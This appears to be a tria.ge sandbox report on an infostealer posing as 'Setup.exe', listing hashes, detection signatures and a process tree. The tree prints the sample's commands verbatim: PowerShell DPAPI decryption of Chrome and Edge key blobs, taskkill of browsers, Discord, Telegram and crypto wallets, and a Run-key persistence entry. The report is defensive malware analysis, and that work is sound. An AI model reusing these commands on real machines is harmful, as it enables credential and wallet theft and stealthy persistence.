Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/07/2024, 11:40

General

  • Target

    Setup.exe

  • Size

    158.4MB

  • MD5

    bc727f4f4436b752f42b3f5e80822490

  • SHA1

    1d0e5426296847c5eafb04a4709da1e53d9547e2

  • SHA256

    d57c9f9f7f8756ec6147594b74513a546793d3479dd52f73cfe63588601bbc3c

  • SHA512

    09a825a9054ba5798ccbfd2b42dc06c89db3f2a6a92f93eb33a7edde7196da5baaf81d2b7a972004a2e4885972c999b6ee21c9cb276ea56a9c2fc7c6039f4658

  • SSDEEP

    1572864:YPD2Ct33+Z58VwrZDI1iKltd4/p3+syaYwYRJ7g2m0j4eZ/OUG02nQ5ixaCUKELg:YeBhZC3YsuL

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 40 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5036
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "chcp"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4464
      • C:\Windows\system32\chcp.com
        chcp
        3⤵
          PID:2720
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:392
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,157,133,155,206,175,6,79,188,76,82,82,3,124,112,127,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,103,130,223,28,139,26,205,240,173,163,214,64,221,199,60,20,56,37,155,130,124,127,255,227,1,252,65,245,80,162,139,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,24,186,123,10,173,11,196,131,98,148,254,114,204,234,229,46,42,1,82,225,105,143,55,9,51,234,101,224,174,17,219,179,48,0,0,0,38,135,17,109,84,74,234,238,45,228,233,155,84,153,96,195,155,90,106,252,169,15,182,146,36,72,20,88,130,236,117,0,246,165,110,176,64,205,85,203,150,217,53,87,234,10,221,186,64,0,0,0,99,119,152,161,129,133,196,99,111,176,1,249,149,113,122,172,213,159,13,195,27,117,218,193,147,122,115,91,33,201,86,94,163,172,35,24,156,109,162,156,147,79,100,220,79,208,171,169,228,226,226,166,138,201,29,115,86,46,242,248,45,138,110,177), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:4552
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,157,133,155,206,175,6,79,188,76,82,82,3,124,112,127,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,103,130,223,28,139,26,205,240,173,163,214,64,221,199,60,20,56,37,155,130,124,127,255,227,1,252,65,245,80,162,139,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,24,186,123,10,173,11,196,131,98,148,254,114,204,234,229,46,42,1,82,225,105,143,55,9,51,234,101,224,174,17,219,179,48,0,0,0,38,135,17,109,84,74,234,238,45,228,233,155,84,153,96,195,155,90,106,252,169,15,182,146,36,72,20,88,130,236,117,0,246,165,110,176,64,205,85,203,150,217,53,87,234,10,221,186,64,0,0,0,99,119,152,161,129,133,196,99,111,176,1,249,149,113,122,172,213,159,13,195,27,117,218,193,147,122,115,91,33,201,86,94,163,172,35,24,156,109,162,156,147,79,100,220,79,208,171,169,228,226,226,166,138,201,29,115,86,46,242,248,45,138,110,177), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1572
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,157,133,155,206,175,6,79,188,76,82,82,3,124,112,127,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,128,117,98,8,12,209,116,233,22,150,184,95,50,21,218,147,20,43,32,180,44,192,191,62,19,240,16,125,249,74,190,163,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,158,119,13,183,25,219,223,255,208,61,224,206,123,41,150,9,82,236,241,154,58,209,138,209,114,34,249,123,167,48,185,48,0,0,0,202,154,221,242,40,152,200,241,157,161,127,252,10,93,163,126,46,136,137,30,208,8,151,123,73,203,222,94,138,149,92,137,55,40,138,65,98,185,50,253,170,72,197,79,104,140,12,250,64,0,0,0,98,118,161,68,44,142,181,163,106,219,47,184,173,179,192,145,117,249,230,206,20,214,24,106,166,253,128,4,248,231,175,156,187,3,77,203,183,92,72,17,183,206,25,201,166,225,115,185,154,110,211,107,221,57,218,21,77,174,17,237,121,123,10,152), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,157,133,155,206,175,6,79,188,76,82,82,3,124,112,127,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,128,117,98,8,12,209,116,233,22,150,184,95,50,21,218,147,20,43,32,180,44,192,191,62,19,240,16,125,249,74,190,163,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,158,119,13,183,25,219,223,255,208,61,224,206,123,41,150,9,82,236,241,154,58,209,138,209,114,34,249,123,167,48,185,48,0,0,0,202,154,221,242,40,152,200,241,157,161,127,252,10,93,163,126,46,136,137,30,208,8,151,123,73,203,222,94,138,149,92,137,55,40,138,65,98,185,50,253,170,72,197,79,104,140,12,250,64,0,0,0,98,118,161,68,44,142,181,163,106,219,47,184,173,179,192,145,117,249,230,206,20,214,24,106,166,253,128,4,248,231,175,156,187,3,77,203,183,92,72,17,183,206,25,201,166,225,115,185,154,110,211,107,221,57,218,21,77,174,17,237,121,123,10,152), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
        2⤵
          PID:1380
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1204
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3944
        • C:\Users\Admin\AppData\Local\Temp\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1852 --field-trial-handle=1856,i,5057708555563673091,15864743171634207688,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
          2⤵
            PID:2020
          • C:\Users\Admin\AppData\Local\Temp\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Setup" --mojo-platform-channel-handle=2032 --field-trial-handle=1856,i,5057708555563673091,15864743171634207688,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
            2⤵
              PID:532
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3248
              • C:\Windows\system32\findstr.exe
                findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
                3⤵
                  PID:4356
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Discord.exe /F 2> nul"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3008
                • C:\Windows\system32\taskkill.exe
                  taskkill /IM Discord.exe /F
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1824
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM DiscordCanary.exe /F 2> nul"
                2⤵
                  PID:2320
                  • C:\Windows\system32\taskkill.exe
                    taskkill /IM DiscordCanary.exe /F
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:804
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM discordDevelopment.exe /F 2> nul"
                  2⤵
                    PID:4652
                    • C:\Windows\system32\taskkill.exe
                      taskkill /IM discordDevelopment.exe /F
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2032
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM DiscordPTB.exe /F 2> nul"
                    2⤵
                      PID:2540
                      • C:\Windows\system32\taskkill.exe
                        taskkill /IM DiscordPTB.exe /F
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1724
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F 2> nul"
                      2⤵
                        PID:400
                        • C:\Windows\system32\taskkill.exe
                          taskkill /IM chrome.exe /F
                          3⤵
                          • Kills process with taskkill
                          PID:3660
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F 2> nul"
                        2⤵
                          PID:384
                          • C:\Windows\system32\taskkill.exe
                            taskkill /IM msedge.exe /F
                            3⤵
                            • Kills process with taskkill
                            PID:3984
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F 2> nul"
                          2⤵
                            PID:3512
                            • C:\Windows\system32\taskkill.exe
                              taskkill /IM opera.exe /F
                              3⤵
                              • Kills process with taskkill
                              PID:2364
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F 2> nul"
                            2⤵
                              PID:3044
                              • C:\Windows\system32\taskkill.exe
                                taskkill /IM brave.exe /F
                                3⤵
                                • Kills process with taskkill
                                PID:2612
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F 2> nul"
                              2⤵
                                PID:1424
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /IM firefox.exe /F
                                  3⤵
                                  • Kills process with taskkill
                                  PID:3340
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F 2> nul"
                                2⤵
                                  PID:1664
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /IM chrome.exe /F
                                    3⤵
                                    • Kills process with taskkill
                                    PID:3896
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F 2> nul"
                                  2⤵
                                    PID:5084
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /IM msedge.exe /F
                                      3⤵
                                      • Kills process with taskkill
                                      PID:3144
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F 2> nul"
                                    2⤵
                                      PID:2644
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill /IM opera.exe /F
                                        3⤵
                                        • Kills process with taskkill
                                        PID:3836
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F 2> nul"
                                      2⤵
                                        PID:3988
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /IM brave.exe /F
                                          3⤵
                                          • Kills process with taskkill
                                          PID:1696
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F 2> nul"
                                        2⤵
                                          PID:4436
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /IM firefox.exe /F
                                            3⤵
                                            • Kills process with taskkill
                                            PID:4004
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
                                          2⤵
                                            PID:5044
                                            • C:\Windows\system32\where.exe
                                              where /r . data.sqlite
                                              3⤵
                                                PID:2136
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Exodus.exe /F 2> nul"
                                              2⤵
                                                PID:644
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /IM Exodus.exe /F
                                                  3⤵
                                                  • Kills process with taskkill
                                                  PID:2916
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Atomic Wallet.exe /F 2> nul"
                                                2⤵
                                                  PID:2708
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill /IM Atomic Wallet.exe /F
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:4464
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F 2> nul"
                                                  2⤵
                                                    PID:804
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /IM Telegram.exe /F
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:664
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Guarda.exe /F 2> nul"
                                                    2⤵
                                                      PID:1804
                                                      • C:\Windows\system32\taskkill.exe
                                                        taskkill /IM Guarda.exe /F
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:4008
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM RiotClientServices.exe /F 2> nul"
                                                      2⤵
                                                        PID:4932
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /IM RiotClientServices.exe /F
                                                          3⤵
                                                          • Kills process with taskkill
                                                          PID:4652
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM RiotClient.exe /F 2> nul"
                                                        2⤵
                                                          PID:4732
                                                          • C:\Windows\system32\taskkill.exe
                                                            taskkill /IM RiotClient.exe /F
                                                            3⤵
                                                            • Kills process with taskkill
                                                            PID:60
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM wassabee.exe /F 2> nul"
                                                          2⤵
                                                            PID:456
                                                            • C:\Windows\system32\taskkill.exe
                                                              taskkill /IM wassabee.exe /F
                                                              3⤵
                                                              • Kills process with taskkill
                                                              PID:2412
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM steam.exe /F 2> nul"
                                                            2⤵
                                                              PID:1476
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /IM steam.exe /F
                                                                3⤵
                                                                • Kills process with taskkill
                                                                PID:1436
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM steamservice.exe /F 2> nul"
                                                              2⤵
                                                                PID:5080
                                                                • C:\Windows\system32\taskkill.exe
                                                                  taskkill /IM steamservice.exe /F
                                                                  3⤵
                                                                  • Kills process with taskkill
                                                                  PID:2100
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM steamwebhelper.exe /F 2> nul"
                                                                2⤵
                                                                  PID:4140
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    taskkill /IM steamwebhelper.exe /F
                                                                    3⤵
                                                                    • Kills process with taskkill
                                                                    PID:3856
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Zcash.exe /F 2> nul"
                                                                  2⤵
                                                                    PID:3376
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      taskkill /IM Zcash.exe /F
                                                                      3⤵
                                                                      • Kills process with taskkill
                                                                      PID:4516
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM EpicGamesLauncher.exe /F 2> nul"
                                                                    2⤵
                                                                      PID:5016
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /IM EpicGamesLauncher.exe /F
                                                                        3⤵
                                                                        • Kills process with taskkill
                                                                        PID:1876
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM EpicGames.exe /F 2> nul"
                                                                      2⤵
                                                                        PID:3384
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /IM EpicGames.exe /F
                                                                          3⤵
                                                                          • Kills process with taskkill
                                                                          PID:5012
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Armory.exe /F 2> nul"
                                                                        2⤵
                                                                          PID:3080
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            taskkill /IM Armory.exe /F
                                                                            3⤵
                                                                            • Kills process with taskkill
                                                                            PID:4912
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Ubisoft.exe /F 2> nul"
                                                                          2⤵
                                                                            PID:3512
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              taskkill /IM Ubisoft.exe /F
                                                                              3⤵
                                                                              • Kills process with taskkill
                                                                              PID:4548
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM bytecoin.exe /F 2> nul"
                                                                            2⤵
                                                                              PID:3880
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                taskkill /IM bytecoin.exe /F
                                                                                3⤵
                                                                                • Kills process with taskkill
                                                                                PID:2164
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Binance.exe /F 2> nul"
                                                                              2⤵
                                                                                PID:4520
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  taskkill /IM Binance.exe /F
                                                                                  3⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:1524
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Jaxx.exe /F 2> nul"
                                                                                2⤵
                                                                                  PID:2576
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /IM Jaxx.exe /F
                                                                                    3⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:1556
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Electrum.exe /F 2> nul"
                                                                                  2⤵
                                                                                    PID:3648
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      taskkill /IM Electrum.exe /F
                                                                                      3⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:3936
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Coinomi.exe /F 2> nul"
                                                                                    2⤵
                                                                                      PID:1664
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        taskkill /IM Coinomi.exe /F
                                                                                        3⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:640
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Bitcoin.exe /F 2> nul"
                                                                                      2⤵
                                                                                        PID:3840
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /IM Bitcoin.exe /F
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:8
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Ethereum.exe /F 2> nul"
                                                                                        2⤵
                                                                                          PID:3924
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            taskkill /IM Ethereum.exe /F
                                                                                            3⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:1804
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F 2> nul"
                                                                                          2⤵
                                                                                            PID:336
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              taskkill /IM chrome.exe /F
                                                                                              3⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:3652
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F 2> nul"
                                                                                            2⤵
                                                                                              PID:2528
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                taskkill /IM msedge.exe /F
                                                                                                3⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:4556
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F 2> nul"
                                                                                              2⤵
                                                                                                PID:4496
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  taskkill /IM opera.exe /F
                                                                                                  3⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:1532
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F 2> nul"
                                                                                                2⤵
                                                                                                  PID:4636
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /IM brave.exe /F
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:1476
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "reg query "HKU\S-1-5-19""
                                                                                                  2⤵
                                                                                                    PID:5000
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg query "HKU\S-1-5-19"
                                                                                                      3⤵
                                                                                                        PID:4432
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Update" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\BluetoothStack_12.1.1.exe" /f"
                                                                                                      2⤵
                                                                                                        PID:4080
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Update" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\BluetoothStack_12.1.1.exe" /f
                                                                                                          3⤵
                                                                                                          • Adds Run key to start application
                                                                                                          PID:3840

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                      Filesize

                                                                                                      3KB

                                                                                                      MD5

                                                                                                      f48896adf9a23882050cdff97f610a7f

                                                                                                      SHA1

                                                                                                      4c5a610df62834d43f470cae7e851946530e3086

                                                                                                      SHA256

                                                                                                      3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

                                                                                                      SHA512

                                                                                                      16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                      Filesize

                                                                                                      2KB

                                                                                                      MD5

                                                                                                      2f87410b0d834a14ceff69e18946d066

                                                                                                      SHA1

                                                                                                      f2ec80550202d493db61806693439a57b76634f3

                                                                                                      SHA256

                                                                                                      5422bc17b852ad463110de0db9b59ffa4219e065d3e2843618d6ebbd14273c65

                                                                                                      SHA512

                                                                                                      a313702f22450ceff0a1d7f890b0c16cf667dbcd668dbafa6dbecd0791236c0bc68e834d12113cc75352365c2a2b6cfcf30b6ef7c97ea53ed135da50de389db4

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                      Filesize

                                                                                                      104B

                                                                                                      MD5

                                                                                                      8b870cdc4ad3aef6130ac34cfc3c29bf

                                                                                                      SHA1

                                                                                                      85adb44b1562e515a76cf31f6a5c9a83223a56c9

                                                                                                      SHA256

                                                                                                      24f62f74531de78197a2a0800f36fa00d2a7a1b24b9488196d31570a231b411d

                                                                                                      SHA512

                                                                                                      9c061ed7a2ea330b67e1626f100fa26f8f70d0291b9b170e9313684f1c8fb7ee4f7ef582965f439aaa10995fe1bef778f4c505a0d29f974d937cab2bf5d3e1c3

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Filesize

                                                                                                      1KB

                                                                                                      MD5

                                                                                                      68d80cc2ac40ea9e5c7297fba6623c45

                                                                                                      SHA1

                                                                                                      05908daef7414f753fa6006082c42485002a7da8

                                                                                                      SHA256

                                                                                                      3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96

                                                                                                      SHA512

                                                                                                      2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\688100b1-7a60-411c-8cf9-f3485408febb.tmp.node

                                                                                                      Filesize

                                                                                                      137KB

                                                                                                      MD5

                                                                                                      04bfbfec8db966420fe4c7b85ebb506a

                                                                                                      SHA1

                                                                                                      939bb742a354a92e1dcd3661a62d69e48030a335

                                                                                                      SHA256

                                                                                                      da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd

                                                                                                      SHA512

                                                                                                      4ea97a9a120ed5bee8638e0a69561c2159fc3769062d7102167b0e92b4f1a5c002a761bd104282425f6cee8d0e39dbe7e12ad4e4a38570c3f90f31b65072dd65

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvnqjo3v.tft.ps1

                                                                                                      Filesize

